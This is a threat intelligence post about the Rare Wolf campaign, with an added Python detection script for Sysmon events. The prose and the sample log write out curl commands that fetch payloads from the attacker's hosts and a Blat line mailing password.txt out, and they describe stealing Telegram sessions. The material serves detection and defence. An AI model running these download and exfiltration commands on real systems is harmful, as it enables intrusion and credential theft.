Rare Wolf attacks Russian organizations with legitimate software and lures disguised as tactical and technical requirements documents
At the beginning of June, BI.ZONE Threat Intelligence experts recorded a new campaign by the Rare Wolf group built around the distribution of Mipko Employee Monitor, a legitimate product for remote monitoring of employee activity on workstations.
Presumably, the victim received a phishing email whose attachment contained the executable file Проект ТТТ 26.2024.scr (.scr is the Windows screensaver extension, but such files are ordinary executables, so the name reads as a document while the file runs as a program). Once the user launched it, the machine was compromised.
In this case, the following actions were implemented:
1. The user was shown the expected decoy document.
2. Archives with additional tools were downloaded from the remote server:
C:\Intel\curl.exe -o C:\Intel\keys.rar hxxp://hostingforme[.]nl/down/keys.rar
C:\Intel\curl.exe -o C:\Intel\MPK.rar hxxp://hostingforme[.]nl/down/MPK.rar
C:\Intel\curl.exe -o C:\Intel\pas.rar hxxp://hostingforme[.]nl/down/pas.rar
3. An executable file that decrypted the downloaded archives was fetched from a second host:
C:\Intel\curl.exe -o C:\Intel\driver.exe hxxp://supersuit[.]site/down/driver.exe
4. Files matching the masks *.doc* and *.pdf*, together with the entire contents of the AppData\Roaming\Telegram Desktop\tdata folder (which stores the Telegram Desktop session, so a copy of it lets the attacker open the victim's account from another machine), were sent to the attacker's mailbox with Blat, a command-line SMTP mailer for Windows.
5. Passwords saved in browsers were collected into a text file, password.txt, which was then sent to the attacker's mailbox the same way.
6. Finally, Mipko Employee Monitor was installed, giving the attacker remote control of the compromised host; it was made persistent by registering it under the Software\Microsoft\Windows\CurrentVersion\Run registry key.
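The chain above maps cleanly onto two telemetry sources most Windows fleets already have: process-creation events (Sysmon Event ID 1) for the .scr launch, the curl downloads and the Blat exfiltration, and registry value-set events (Sysmon Event ID 13) for the Run-key persistence. The following is an added example of rule-based triage over such events; it is written for this article and is not BI.ZONE detection content. The indicators (the C:\Intel\ staging directory, the two download hosts, the Telegram tdata folder, password.txt, Blat, the Run key) are taken from the post; the event field layout, the rule names, the sample log and details such as the Blat recipient, the Run-key value name and the Mipko install path are constructed and assumed. The .scr rule is a heuristic and will need tuning in environments that legitimately deploy screensavers outside the Windows directory.

```python
"""Rule-based triage of Sysmon-style process-creation (EID 1) and registry
value-set (EID 13) events for the Rare Wolf chain described in the post.
Indicators come from the post; event shape, rule names and the sample log
are constructed for this example and are not BI.ZONE detection content."""
import re
from urllib.parse import urlparse

# Indicators from the post (domains undefanged so they match real log data).
STAGING_DIR = "c:\\intel\\"
DOWNLOAD_HOSTS = {"hostingforme.nl", "supersuit.site"}
RUN_KEY = "software\\microsoft\\windows\\currentversion\\run"
TELEGRAM_TDATA = "telegram desktop\\tdata"
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def _f(event, key):
    """Field lower-cased: Windows paths and registry keys are case-insensitive."""
    return str(event.get(key, "")).lower()


def rule_scr_lure_launch(event):
    """Heuristic (assumption): a .scr run from outside \\windows\\ is far more
    likely a disguised payload than a real screensaver."""
    image = _f(event, "Image")
    return event.get("EventID") == 1 and image.endswith(".scr") and "\\windows\\" not in image


def rule_curl_staging_download(event):
    """curl.exe writing into C:\\Intel\\ or fetching from the campaign's hosts."""
    if event.get("EventID") != 1:
        return False
    cmd = _f(event, "CommandLine")
    if not (_f(event, "Image").endswith("\\curl.exe") or "curl.exe" in cmd):
        return False
    hosts = {urlparse(u).hostname or "" for u in URL_RE.findall(cmd)}
    return STAGING_DIR in cmd or bool(hosts & DOWNLOAD_HOSTS)


def rule_blat_exfil(event):
    """Blat running, or any non-Telegram process naming the tdata folder or
    password.txt on its command line."""
    if event.get("EventID") != 1:
        return False
    image, cmd = _f(event, "Image"), _f(event, "CommandLine")
    uses_blat = image.endswith("\\blat.exe") or "blat.exe" in cmd
    touches_loot = (TELEGRAM_TDATA in cmd or "password.txt" in cmd) \
        and not image.endswith("\\telegram.exe")
    return uses_blat or touches_loot


def rule_run_key_persistence(event):
    """Run-key value pointing at Mipko or into the staging directory."""
    if event.get("EventID") != 13:
        return False
    details = _f(event, "Details")
    return RUN_KEY in _f(event, "TargetObject") and ("mipko" in details or STAGING_DIR in details)


RULES = {
    "scr_lure_launch": rule_scr_lure_launch,
    "curl_staging_download": rule_curl_staging_download,
    "blat_exfil": rule_blat_exfil,
    "run_key_persistence": rule_run_key_persistence,
}


def classify(event):
    """Names of every rule the event triggers (empty list for benign events)."""
    return [name for name, rule in RULES.items() if rule(event)]


def summarize(events):
    """Rule name -> number of matching events; rules with no hits are omitted."""
    counts = {}
    for ev in events:
        for name in classify(ev):
            counts[name] = counts.get(name, 0) + 1
    return counts


def chain_complete(events):
    """True when every stage (lure, staging, exfil, persistence) was observed."""
    return set(summarize(events)) == set(RULES)


# Constructed sample log: five events modelled on the post plus two benign look-alikes.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Users\\u\\Downloads\\Проект ТТТ 26.2024.scr",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "\"C:\\Users\\u\\Downloads\\Проект ТТТ 26.2024.scr\""},
    {"EventID": 1, "Image": "C:\\Intel\\curl.exe",
     "CommandLine": "C:\\Intel\\curl.exe -o C:\\Intel\\keys.rar http://hostingforme.nl/down/keys.rar"},
    {"EventID": 1, "Image": "C:\\Intel\\curl.exe",
     "CommandLine": "C:\\Intel\\curl.exe -o C:\\Intel\\driver.exe http://supersuit.site/down/driver.exe"},
    {"EventID": 1, "Image": "C:\\Intel\\blat.exe",  # Blat location and recipient are assumptions
     "CommandLine": "C:\\Intel\\blat.exe C:\\Intel\\password.txt -to drop@example.com"},
    {"EventID": 13,  # value name and Mipko path are assumptions
     "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MPK",
     "Details": "C:\\Intel\\MPK\\MPK.exe"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\curl.exe",  # benign download
     "CommandLine": "curl.exe -o C:\\Users\\u\\Downloads\\x.zip https://example.com/x.zip"},
    {"EventID": 13,  # benign Run-key entry
     "TargetObject": "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
     "Details": "C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev) or "-", ev.get("CommandLine") or ev.get("TargetObject"))
    print("chain complete:", chain_complete(SAMPLE_EVENTS))
```

Each rule on its own is a medium-confidence signal (curl and a Run-key write are everyday events); the value is in correlating them per host, which is what chain_complete does in the simplest form. In a SIEM the same logic would be expressed as per-host aggregation over a time window, with the staging directory and the two hosts as the high-confidence anchors.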
Read more about the Rare Wolf group in our research.
